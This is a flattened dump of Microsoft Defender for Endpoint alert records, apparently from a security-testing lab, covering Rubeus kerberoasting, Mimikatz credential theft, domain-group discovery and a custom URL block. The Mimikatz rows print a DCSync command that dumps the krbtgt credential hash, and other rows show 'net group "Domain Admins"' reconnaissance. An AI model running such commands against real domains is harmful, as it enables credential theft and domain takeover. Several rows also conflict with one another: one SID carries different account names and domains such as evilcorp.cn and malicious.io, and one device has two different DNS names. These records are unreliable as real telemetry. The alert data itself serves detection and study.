alertId
stringclasses
278 values
providerAlertId
stringclasses
278 values
incidentId
int64
486
989
serviceSource
stringclasses
2 values
creationTime
stringdate
2022-09-30 05:04:51
2023-01-24 06:03:50
lastUpdatedTime
stringdate
2022-11-12 01:35:42
2023-01-24 06:05:47
resolvedTime
stringclasses
23 values
firstActivity
stringdate
2022-09-07 09:25:00
2023-01-24 05:31:07
lastActivity
stringdate
2022-09-30 05:00:00
2023-01-24 05:43:53
title
stringclasses
62 values
description
stringclasses
51 values
category
stringclasses
12 values
status
stringclasses
2 values
severity
stringclasses
4 values
investigationId
int64
20
64
investigationState
stringclasses
9 values
classification
stringclasses
1 value
determination
stringclasses
1 value
detectionSource
stringclasses
7 values
detectorId
stringclasses
48 values
assignedTo
stringclasses
3 values
actorName
stringclasses
1 value
threatFamilyName
stringclasses
6 values
mitreTechniques
listlengths
0
8
devices
listlengths
1
6
entities
listlengths
0
49
entityType
stringclasses
2 values
evidenceCreationTime
stringclasses
469 values
verdict
stringclasses
5 values
remediationStatus
stringclasses
2 values
accountName
stringclasses
30 values
domainName
stringclasses
17 values
userSid
stringclasses
22 values
aadUserId
stringclasses
8 values
userPrincipalName
stringclasses
14 values
sha1
stringclasses
28 values
sha256
stringclasses
27 values
fileName
stringclasses
21 values
filePath
stringclasses
13 values
processId
int64
0
20.7k
processCommandLine
stringclasses
67 values
processCreationTime
stringclasses
133 values
parentProcessId
int64
0
14.6k
parentProcessCreationTime
stringclasses
63 values
parentProcessFileName
stringclasses
14 values
parentProcessFilePath
stringclasses
11 values
detectionStatus
stringclasses
1 value
deviceId
stringclasses
9 values
da638072962440564421_38923631
bdbef9b4-af97-4ac8-812b-2d008732fb04
975
MicrosoftDefenderForEndpoint
2022-12-22T08:57:24.0564629Z
2022-12-22T08:59:28.19Z
null
2022-12-22T08:47:52.0649455Z
2022-12-22T08:47:52.0657273Z
Possible use of the Rubeus kerberoasting tool
Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication. During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets.
SuspiciousActivity
New
Medium
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
6606ef29-d293-4f24-a7c5-334dcb40b412
null
null
null
[ "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Critical", "tags": [], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08" } } ]
[ { "aadUserId": null, "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:57:24.1Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:46:48.89Z
Suspicious
None
darol
malicious.io
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T21:05:03.9033333Z
Suspicious
None
darol
corp.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:53.9566667Z
Suspicious
None
jeff
staging.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:13:50.9266667Z
Suspicious
None
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T08:20:31.0933333Z
Suspicious
None
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-08T11:03:51.59Z
Suspicious
None
darol
corp.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930661007015_1390205570
110e581a-b121-4c70-b48a-e5d68fd5e1aa
765
MicrosoftDefenderForEndpoint
2022-11-21T02:04:26.100718Z
2022-11-26T01:35:43.17Z
2022-11-26T01:35:43.0633333Z
2022-11-21T02:02:29.8592876Z
2022-11-21T02:11:53.0116481Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:04:26.1266667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:26.1266667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-11-21T02:02:27.1310359Z", "processId": 9780, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:08:06.8Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-11-21T02:06:53.7913003Z", "processId": 1912, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:43.93Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-11-21T02:11:50.3921031Z", "processId": 9404, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T13:51:27.9433333Z
Suspicious
None
user1
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:05:51.15Z
Suspicious
None
jeff
evilcorp.cn
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T07:43:44.26Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:36:54.8233333Z
Benign
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:48:30.9266667Z
Suspicious
None
MSDXV8-Win10V$
MSDXV8
S-1-5-18
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:54.5333333Z
Unknown
Active
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
9a3be34e8316ebb945a4d5818a4066c91fe98c95
54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6
nslookup.exe
C:\Windows\System32
7,544
nslookup msdxv2-dc.msdxv2.m365dpoc.com
2022-09-30T06:11:51.7207947Z
10,824
2022-09-30T06:11:51.7062175Z
cmd.exe
C:\Windows\System32
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638043450382289041_499189581
7fe2225b-b6ae-4a93-a261-13e9dd6d5861
741
MicrosoftDefenderForEndpoint
2022-11-18T05:10:38.2289225Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:04:12.7195838Z
2022-11-18T05:13:20.5030117Z
Suspicious Permission Groups Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1069.001", "T1069.002", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "internal.corp", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:10:38.28Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:38.28Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-18T05:09:25.177958Z", "processId": 4744, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:38.28Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" ", "processCreationTime": "2022-11-18T05:04:12.7150402Z", "processId": 4976, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:38.4733333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-18T05:09:25.2555067Z", "processId": 10272, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:34.3233333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-18T05:13:18.980624Z", "processId": 9780, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:34.4833333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-18T05:13:19.0526991Z", "processId": 8200, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638071377528766476_476927832
da638071377528766476_476927832
970
MicrosoftDefenderForEndpoint
2022-12-20T12:55:52.8766803Z
2022-12-20T12:55:54.05Z
null
2022-12-20T12:52:35.3312494Z
2022-12-20T12:52:35.6261961Z
CNN block
Block CNN
SuspiciousActivity
New
Medium
null
UnsupportedAlertType
null
null
CustomerTI
360fdb3b-18a9-471b-9ad0-ad80a4cbcb02
null
null
null
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV8" } ], "mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Medium", "tags": [], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08" } } ]
[ { "aadUserId": null, "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-20T12:55:53.1166667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-12-20T12:55:53.1166667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "www.cnn.com", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-12-20T12:55:53.1166667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "cnn.com", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-12-20T12:55:53.1166667Z", "fileName": null, "filePath": null, "ipAddress": "146.75.107.5", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "steve", "detectionStatus": null, "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-20T12:55:53.1166667Z", "fileName": "msedge.exe", "filePath": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application", "ipAddress": null, "parentProcessCreationTime": "2022-12-20T12:52:33.2640457Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 9792, "processCommandLine": "\"msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1984,i,16038062398573536124,16214164099631202271,131072 /prefetch:3", "processCreationTime": "2022-12-20T12:52:33.7651136Z", "processId": 10512, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "417911d0ed23fa27821fb50f094d994ed8fec8e4", "sha256": "34cb61ab7093580dd3ca4e4cbee00e1f55f8299f1e40b54a4a611f2a62566d79", "url": null, "userPrincipalName": "steve@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-12-20T12:55:53.4633333Z", "fileName": null, "filePath": null, "ipAddress": "151.101.131.5", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T15:27:27.03Z
Suspicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:08:38.4733333Z
Suspicious
None
svc_acct
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T17:23:59.81Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
